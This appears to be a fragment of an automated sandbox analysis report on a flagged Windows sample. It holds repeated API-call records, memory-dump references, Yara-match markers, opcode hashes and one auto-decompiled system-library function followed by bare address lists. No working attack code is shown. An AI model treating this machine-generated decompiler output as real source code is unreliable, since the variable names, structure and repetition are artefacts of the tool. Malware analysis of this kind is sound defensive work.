                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID: .z`
                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID: oL
                                                                                                                                                  • API String ID: 1279760036-2581261730
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID: .z`
                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E00C78788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				short* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _v32;
                                                                                                                                                  				char _v36;
                                                                                                                                                  				signed int _v40;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				signed int _v48;
                                                                                                                                                  				signed int _v52;
                                                                                                                                                  				signed int _v56;
                                                                                                                                                  				signed int _v60;
                                                                                                                                                  				char _v68;
                                                                                                                                                  				void* _t216;
                                                                                                                                                  				intOrPtr _t231;
                                                                                                                                                  				short* _t235;
                                                                                                                                                  				intOrPtr _t257;
                                                                                                                                                  				short* _t261;
                                                                                                                                                  				intOrPtr _t284;
                                                                                                                                                  				intOrPtr _t288;
                                                                                                                                                  				void* _t314;
                                                                                                                                                  				signed int _t318;
                                                                                                                                                  				short* _t319;
                                                                                                                                                  				intOrPtr _t321;
                                                                                                                                                  				void* _t328;
                                                                                                                                                  				void* _t329;
                                                                                                                                                  				char* _t332;
                                                                                                                                                  				signed int _t333;
                                                                                                                                                  				signed int* _t334;
                                                                                                                                                  				void* _t335;
                                                                                                                                                  				void* _t338;
                                                                                                                                                  				void* _t339;
                                                                                                                                                  
                                                                                                                                                  				_t328 = __edx;
                                                                                                                                                  				_t322 = __ecx;
                                                                                                                                                  				_t318 = 0;
                                                                                                                                                  				_t334 = _a4;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v28 = 0;
                                                                                                                                                  				_v48 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v40 = 0;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_v52 = 0;
                                                                                                                                                  				if(_t334 == 0) {
                                                                                                                                                  					_t329 = 0xc000000d;
                                                                                                                                                  					L49:
                                                                                                                                                  					_t334[0x11] = _v56;
                                                                                                                                                  					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                  					_t334[0x12] = _v60;
                                                                                                                                                  					_t334[0x13] = _v28;
                                                                                                                                                  					_t334[0x17] = _v20;
                                                                                                                                                  					_t334[0x16] = _v48;
                                                                                                                                                  					_t334[0x18] = _v40;
                                                                                                                                                  					_t334[0x14] = _v32;
                                                                                                                                                  					_t334[0x15] = _v52;
                                                                                                                                                  					return _t329;
                                                                                                                                                  				}
                                                                                                                                                  				_v56 = 0;
                                                                                                                                                  				if(E00C78460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                  					_v56 = 1;
                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                  						_t207 = E00C5E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                  					}
                                                                                                                                                  					_push(1);
                                                                                                                                                  					_v8 = _t318;
                                                                                                                                                  					E00C7718A(_t207);
                                                                                                                                                  					_t335 = _t335 + 4;
                                                                                                                                                  				}
                                                                                                                                                  				_v60 = _v60 | 0xffffffff;
                                                                                                                                                  				if(E00C78460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                  					_t333 =  *_v8;
                                                                                                                                                  					_v60 = _t333;
                                                                                                                                                  					_t314 = E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  					_push(_t333);
                                                                                                                                                  					_v8 = _t318;
                                                                                                                                                  					E00C7718A(_t314);
                                                                                                                                                  					_t335 = _t335 + 4;
                                                                                                                                                  				}
                                                                                                                                                  				_t216 = E00C78460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                  				_t332 = ";";
                                                                                                                                                  				if(_t216 < 0) {
                                                                                                                                                  					L17:
                                                                                                                                                  					if(E00C78460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                  						L30:
                                                                                                                                                  						if(E00C78460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                  							L46:
                                                                                                                                                  							_t329 = 0;
                                                                                                                                                  							L47:
                                                                                                                                                  							if(_v8 != _t318) {
                                                                                                                                                  								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  							}
                                                                                                                                                  							if(_v28 != _t318) {
                                                                                                                                                  								if(_v20 != _t318) {
                                                                                                                                                  									E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                  									_v20 = _t318;
                                                                                                                                                  									_v40 = _t318;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							goto L49;
                                                                                                                                                  						}
                                                                                                                                                  						_t231 = _v24;
                                                                                                                                                  						_t322 = _t231 + 4;
                                                                                                                                                  						_push(_t231);
                                                                                                                                                  						_v52 = _t322;
                                                                                                                                                  						E00C7718A(_t231);
                                                                                                                                                  						if(_t322 == _t318) {
                                                                                                                                                  							_v32 = _t318;
                                                                                                                                                  						} else {
                                                                                                                                                  							_v32 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                  						}
                                                                                                                                                  						if(_v32 == _t318) {
                                                                                                                                                  							_v52 = _t318;
                                                                                                                                                  							L58:
                                                                                                                                                  							_t329 = 0xc0000017;
                                                                                                                                                  							goto L47;
                                                                                                                                                  						} else {
                                                                                                                                                  							E00C52340(_v32, _v8, _v24);
                                                                                                                                                  							_v16 = _v32;
                                                                                                                                                  							_a4 = _t318;
                                                                                                                                                  							_t235 = E00C6E679(_v32, _t332);
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t319 = _t235;
                                                                                                                                                  								if(_t319 == 0) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								 *_t319 = 0;
                                                                                                                                                  								_t321 = _t319 + 2;
                                                                                                                                                  								E00C5E2A8(_t322,  &_v68, _v16);
                                                                                                                                                  								if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  									_a4 = _a4 + 1;
                                                                                                                                                  								}
                                                                                                                                                  								_v16 = _t321;
                                                                                                                                                  								_t235 = E00C6E679(_t321, _t332);
                                                                                                                                                  								_pop(_t322);
                                                                                                                                                  							}
                                                                                                                                                  							_t236 = _v16;
                                                                                                                                                  							if( *_v16 != _t319) {
                                                                                                                                                  								E00C5E2A8(_t322,  &_v68, _t236);
                                                                                                                                                  								if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  									_a4 = _a4 + 1;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							if(_a4 == 0) {
                                                                                                                                                  								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                  								_v52 = _v52 & 0x00000000;
                                                                                                                                                  								_v32 = _v32 & 0x00000000;
                                                                                                                                                  							}
                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                  								E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                  							}
                                                                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                                                                  							_t318 = 0;
                                                                                                                                                  							goto L46;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t257 = _v24;
                                                                                                                                                  					_t322 = _t257 + 4;
                                                                                                                                                  					_push(_t257);
                                                                                                                                                  					_v40 = _t322;
                                                                                                                                                  					E00C7718A(_t257);
                                                                                                                                                  					_t338 = _t335 + 4;
                                                                                                                                                  					if(_t322 == _t318) {
                                                                                                                                                  						_v20 = _t318;
                                                                                                                                                  					} else {
                                                                                                                                                  						_v20 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                  					}
                                                                                                                                                  					if(_v20 == _t318) {
                                                                                                                                                  						_v40 = _t318;
                                                                                                                                                  						goto L58;
                                                                                                                                                  					} else {
                                                                                                                                                  						E00C52340(_v20, _v8, _v24);
                                                                                                                                                  						_v16 = _v20;
                                                                                                                                                  						_a4 = _t318;
                                                                                                                                                  						_t261 = E00C6E679(_v20, _t332);
                                                                                                                                                  						_t335 = _t338 + 0x14;
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_v12 = _t261;
                                                                                                                                                  							if(_t261 == _t318) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_v12 = _v12 + 2;
                                                                                                                                                  							 *_v12 = 0;
                                                                                                                                                  							E00C5E2A8(_v12,  &_v68, _v16);
                                                                                                                                                  							if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                                  							}
                                                                                                                                                  							_v16 = _v12;
                                                                                                                                                  							_t261 = E00C6E679(_v12, _t332);
                                                                                                                                                  							_pop(_t322);
                                                                                                                                                  						}
                                                                                                                                                  						_t269 = _v16;
                                                                                                                                                  						if( *_v16 != _t318) {
                                                                                                                                                  							E00C5E2A8(_t322,  &_v68, _t269);
                                                                                                                                                  							if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						if(_a4 == _t318) {
                                                                                                                                                  							E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                  							_v40 = _t318;
                                                                                                                                                  							_v20 = _t318;
                                                                                                                                                  						}
                                                                                                                                                  						if(_v8 != _t318) {
                                                                                                                                                  							E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  						}
                                                                                                                                                  						_v8 = _t318;
                                                                                                                                                  						goto L30;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t284 = _v24;
                                                                                                                                                  				_t322 = _t284 + 4;
                                                                                                                                                  				_push(_t284);
                                                                                                                                                  				_v48 = _t322;
                                                                                                                                                  				E00C7718A(_t284);
                                                                                                                                                  				_t339 = _t335 + 4;
                                                                                                                                                  				if(_t322 == _t318) {
                                                                                                                                                  					_v28 = _t318;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v28 = E00C5E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                  				}
                                                                                                                                                  				if(_v28 == _t318) {
                                                                                                                                                  					_v48 = _t318;
                                                                                                                                                  					goto L58;
                                                                                                                                                  				} else {
                                                                                                                                                  					E00C52340(_v28, _v8, _v24);
                                                                                                                                                  					_v16 = _v28;
                                                                                                                                                  					_a4 = _t318;
                                                                                                                                                  					_t288 = E00C6E679(_v28, _t332);
                                                                                                                                                  					_t335 = _t339 + 0x14;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_v12 = _t288;
                                                                                                                                                  						if(_t288 == _t318) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_v12 = _v12 + 2;
                                                                                                                                                  						 *_v12 = 0;
                                                                                                                                                  						E00C5E2A8(_v12,  &_v68, _v16);
                                                                                                                                                  						if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  							_a4 = _a4 + 1;
                                                                                                                                                  						}
                                                                                                                                                  						_v16 = _v12;
                                                                                                                                                  						_t288 = E00C6E679(_v12, _t332);
                                                                                                                                                  						_pop(_t322);
                                                                                                                                                  					}
                                                                                                                                                  					_t296 = _v16;
                                                                                                                                                  					if( *_v16 != _t318) {
                                                                                                                                                  						E00C5E2A8(_t322,  &_v68, _t296);
                                                                                                                                                  						if(E00C75553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  							_a4 = _a4 + 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if(_a4 == _t318) {
                                                                                                                                                  						E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                  						_v48 = _t318;
                                                                                                                                                  						_v28 = _t318;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v8 != _t318) {
                                                                                                                                                  						E00C5E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = _t318;
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  			}





































                                                                                                                                                  0x00cc1bce
                                                                                                                                                  0x00cc1bd2
                                                                                                                                                  0x00cc1bd2
                                                                                                                                                  0x00c78ad8
                                                                                                                                                  0x00c78aeb
                                                                                                                                                  0x00c78aeb
                                                                                                                                                  0x00c78af0
                                                                                                                                                  0x00c78af4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78af4
                                                                                                                                                  0x00c78a42
                                                                                                                                                  0x00c78926
                                                                                                                                                  0x00c78929
                                                                                                                                                  0x00c7892c
                                                                                                                                                  0x00c7892d
                                                                                                                                                  0x00c78930
                                                                                                                                                  0x00c78935
                                                                                                                                                  0x00c7893a
                                                                                                                                                  0x00c78b51
                                                                                                                                                  0x00c78940
                                                                                                                                                  0x00c78954
                                                                                                                                                  0x00c78954
                                                                                                                                                  0x00c7895a
                                                                                                                                                  0x00cc1b63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c78960
                                                                                                                                                  0x00c78969
                                                                                                                                                  0x00c78973
                                                                                                                                                  0x00c78976
                                                                                                                                                  0x00c78979
                                                                                                                                                  0x00c7897e
                                                                                                                                                  0x00c78981
                                                                                                                                                  0x00c78981
                                                                                                                                                  0x00c78986
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cc1b6e
                                                                                                                                                  0x00cc1b74
                                                                                                                                                  0x00cc1b7b
                                                                                                                                                  0x00cc1b8f
                                                                                                                                                  0x00cc1b91
                                                                                                                                                  0x00cc1b91
                                                                                                                                                  0x00cc1b99
                                                                                                                                                  0x00cc1b9c
                                                                                                                                                  0x00cc1ba2
                                                                                                                                                  0x00cc1ba2
                                                                                                                                                  0x00c7898c
                                                                                                                                                  0x00c78992
